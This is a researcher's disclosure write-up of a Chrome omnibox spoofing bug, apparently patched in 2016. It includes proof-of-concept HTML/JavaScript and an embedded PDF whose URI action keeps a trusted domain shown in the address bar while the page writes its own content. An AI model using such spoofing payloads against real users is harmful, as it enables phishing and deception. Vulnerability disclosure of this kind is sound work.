Google Chrome Address Bar Spoof


The PoC

At first I noticed that if you were to manually navigate within Google Chrome to a website with a non-existant port like 'https://www.facebook.com:82', then you would notice a ~20 second window where the document does not change and yet the URL has changed in the omnibox. To somehow trick a user into typing out the URL manually is a stretch, so I instead reported a PoC relying on the drag n drop action. This ended up being a 'wont-fix' bug as the drag n drop action was too much user interaction according to Google.

The following is the original PoC reported:

<script>
onbeforeunload=function(){
	document.write('<b>Welcome to {Some Website}</b>');
	document.title='OtherWebsite.ltd';
};
</script>
<a href="https://www.facebook.com:82" onclick="alert('Please drag and drop this in this windows addressbar');return false;">Drag and drop me!</a>
<br>

I still thought there was something interesting about the behavior, and so I went to look for a better way. I was trying to think of ways one can redirect a page to another and one of the ideas that came up was PDF based redirect. I remember Jun (@shhnjk) wrote about PDF redirection which I specifically remember was changing the URL much faster than a normal anchor navigation, so I set up my PoC and it worked!

<script>
onbeforeunload=function(){
	document.write('<b>Welcome to {Some Website}</b>');
	document.title='OtherWebsite.ltd';
};
</script>
<embed type="application/pdf" src="data:application/pdf;base64,JVBERi0xLjcKIAp0cmFpbGVyCjw8Ci9Sb290IDEgMCBSCj4+CiAKMSAwIG9iago8PAovVHlwZSAvQ2F0YWxvZwovUGFnZXMgMiAwIFIKL09wZW5BY3Rpb24gMiAwIFIKPj4KZW5kb2JqCiAKMiAwIG9iago8PAovVHlwZSAvQWN0aW9uCi9TIC9VUkkKL1VSSSAoaHR0cDovL3d3dy5mYWNlYm9vay5jb206ODMpCj4+CmVuZG9iagogCiUlRU9G" width="640" height="480">

Source of the embedded PDF.
%PDF-1.7
 
trailer
<<
/Root 1 0 R
>>
 
1 0 obj
<<
/Type /Catalog
/Pages 2 0 R
/OpenAction 2 0 R
>>
endobj
 
2 0 obj
<<
/Type /Action
/S /URI
/URI (http://www.facebook.com:83)
>>
endobj
 
%%EOF

The embedded PDF uses a different method to navigate than say anchor tags, where the specific security measure of not showing a URL until commit was not there. Since we are trying to navigate to a non existent port, after roughly 20 seconds a chrome error page is shown but 20 seconds is more than enough to trick a user.
This required no user interaction at all which was as good as can be. This was a good lesson in not giving up on a bug or perhaps not reporting bugs too early.

References:

The report: https://bugs.chromium.org/p/chromium/issues/detail?id=660498
Confused Deputy Problem: https://en.wikipedia.org/wiki/Confused_deputy_problem
Google stable channel update fixing this bug: https://chromereleases.googleblog.com/2016/12/stable-channel-update-for-desktop.html